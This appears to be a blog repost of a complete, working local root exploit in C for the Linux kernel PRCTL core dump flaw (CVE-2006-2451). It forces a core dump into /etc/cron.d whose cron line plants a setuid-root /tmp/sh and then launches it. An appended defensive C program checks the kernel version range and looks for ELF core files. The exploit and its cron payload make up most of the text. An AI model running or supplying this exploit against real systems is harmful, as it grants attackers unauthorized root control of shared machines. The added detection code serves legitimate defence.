Linux Kernel 2.6.x latest local overflow code (repost)
Tool category: attack program
Platform: Linux
Tool size: 1684 Bytes
File MD5: f011910d6400652177c3b2e66bfb7144
Tool source: http://www.rs-labs.com/
Linux Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)
PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
CODE:
/*****************************************************/
/* Local r00t Exploit for:                           */
/* Linux Kernel PRCTL Core Dump Handling             */
/* ( BID 18874 / CVE-2006-2451 )                     */
/* Kernel 2.6.x (>= 2.6.13 && < 2.6.17.4)            */
/* By:                                               */
/* - dreyer (main PoC code)                          */
/* - RoMaNSoFt (local root code)                     */
/* [ 10.Jul.2006 ]                                   */
/*****************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <sys/prctl.h>

char *payload=" SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin * * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core ";

int main()
{
    int child;
    struct rlimit corelimit;

    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t ");
    printf("By: dreyer & RoMaNSoFt ");
    printf("[ 10.Jul.2006 ] ");

    /* Remove the size limit on core files */
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);

    printf("[*] Creating Cron entry ");

    if ( !( child = fork() )) {
        /* Child: change directory, set the dumpable flag to 2, then wait */
        chdir("/etc/cron.d");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }

    /* Parent: signal the child so that it dumps core */
    kill(child, SIGSEGV);

    printf("[*] Sleeping for aprox. one minute (** please wait **) ");
    sleep(62);

    printf("[*] Running shell (remember to remove /tmp/sh when finished) ... ");
    system("/tmp/sh -p");
}

From "ITPUB Blog", link: http://blog.itpub.net/10617542/viewspace-960173/. If you repost this, please credit the source; otherwise legal liability will be pursued.
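A defender-side check built from the details in this post, as an added example that is not part of the original post or the exploit authors' code: it tests whether a kernel release string falls in the stated range (>= 2.6.13 && < 2.6.17.4) and whether a file is an ELF core dump, the kind of file the payload above expects to land in /etc/cron.d. The function names are assumptions, and the version test is only a heuristic, since a distribution kernel may carry a backported fix.

```c
/* Added defensive example; all function names are illustrative. */
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>

/* 1 if release (e.g. "2.6.16.20-smp") is >= 2.6.13 and < 2.6.17.4.
   Heuristic: a distribution kernel may carry a backported fix. */
int in_affected_range(const char *release)
{
    int a = 0, b = 0, c = 0, d = 0;
    if (sscanf(release, "%d.%d.%d.%d", &a, &b, &c, &d) < 3)
        return 0;
    if (a != 2 || b != 6 || c < 13 || c > 17)
        return 0;
    return c < 17 || d < 4;
}

/* 1 if buf starts with an ELF header whose e_type is ET_CORE (4). */
int is_elf_core(const unsigned char *buf, size_t len)
{
    if (len < 18 || memcmp(buf, "\177ELF", 4) != 0)
        return 0;
    /* e_type: 16 bits at offset 16; EI_DATA (buf[5]) == 2 is big-endian */
    return (buf[5] == 2 ? (buf[16] << 8) | buf[17] : (buf[17] << 8) | buf[16]) == 4;
}

/* 1 if the file at path is an ELF core dump, 0 otherwise. */
int file_is_core(const char *path)
{
    unsigned char buf[18];
    size_t n;
    FILE *f = fopen(path, "rb");
    if (f == NULL)
        return 0;
    n = fread(buf, 1, sizeof buf, f);
    fclose(f);
    return is_elf_core(buf, n);
}

int main(int argc, char **argv)
{
    struct utsname u;
    int i, hits = 0;
    if (uname(&u) == 0 && in_affected_range(u.release))
        printf("kernel %s is in the affected range\n", u.release);
    for (i = 1; i < argc; i++)
        if (file_is_core(argv[i]))
            hits += printf("core dump: %s\n", argv[i]) > 0;
    return hits > 0;
}
```

Run it with the files to inspect as arguments, for example every file in /etc/cron.d; it exits non-zero if any of them is a core dump.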